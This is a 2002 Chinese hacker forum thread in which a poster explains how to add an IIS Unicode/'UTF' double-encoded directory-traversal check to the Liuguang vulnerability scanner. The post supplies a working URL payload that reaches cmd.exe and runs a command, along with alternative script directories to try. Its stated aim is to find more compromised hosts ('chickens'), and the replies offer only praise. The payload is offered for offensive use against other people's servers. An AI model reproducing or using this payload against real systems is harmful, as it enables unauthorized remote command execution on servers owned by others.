>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  流光的一点小遗憾[原创]
发表文章 发表涂鸦
  回复数:2  点击数:226 将此页发给您的朋友        
作者 主题: 流光的一点小遗憾[原创] 回复 | 收藏 | 打印 | 篇末
lcx帅哥哦
级别:高级站友
威望:0
经验:0
货币:461
体力:19.2
来源:61.156.196.*
总发帖数:172
注册日期:2002-03-06
查看 邮件 主页 QQ 消息 引用 复制 下载 

我发现流光扫描cgi漏洞时,漏掉了一个非常重要的漏洞,就是utf漏洞。什么是utf漏洞,其实就是和大家所熟悉的unicode漏洞基本上一样。有二次解码漏洞的服务器肯定有UTF漏洞,就好像有Unicode漏洞的服务器肯定有2次解码漏洞一样。也许小榕想只要能扫到二次解码就可以了,不用扫utf了。但是经我测试,有的服务器却只有utf漏洞,没有二次解码漏洞。我们来自己动手把这个漏洞扫描加上去,用记事本打开流光目录下的文件cgibugs.dat或ntcgi.dat,加入以下几行码:
/Scripts/..%u0025u005c..%u0025u005c..%u0025u005c..%u0025u005c..%u0025u005c..%u0025u005cWINNT/system32/cmd.exe?/c+dir
其中/Scripts/可以改为/_mem_bin/;/_vti_bin/;/bin/scripts/;/cgi-bin/等等,自己看着小榕的u漏洞列表改吧。
改完后,你再试一下,是不是又可以找到很多u的鸡?
----------------------------------------------------------
http://haiyangtop.126.com

编辑 删除 发表时间发表于 2002-04-01.13:19:21   MSIE 5.0 Windows 98IP: 已记录
哑吧帅哥哦
级别:老 站 友
威望:0
经验:0
货币:1777
体力:100
来源:61.136.221.*
总发帖数:406
注册日期:2002-02-12
查看 邮件 主页 QQ 消息 引用 复制 下载 

高手!!

编辑 删除 发表时间发表于 2002-04-01.13:38:14   MSIE 5.5 Windows 2000IP: 已记录
aloner帅哥哦
级别:长 老 级
威望:0
经验:0
货币:151
体力:4.8
来源:NetxEyes
总发帖数:606
注册日期:2002-02-21
查看 邮件 主页 QQ 消息 引用 复制 下载 

收藏
----------------------------------------------------------
Flying...

编辑 删除 发表时间发表于 2002-04-01.13:42:31   MSIE 6.0 Windows 2000IP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符

[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 0 票  
所有时间均为: 北京时间 ↑TOP 
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题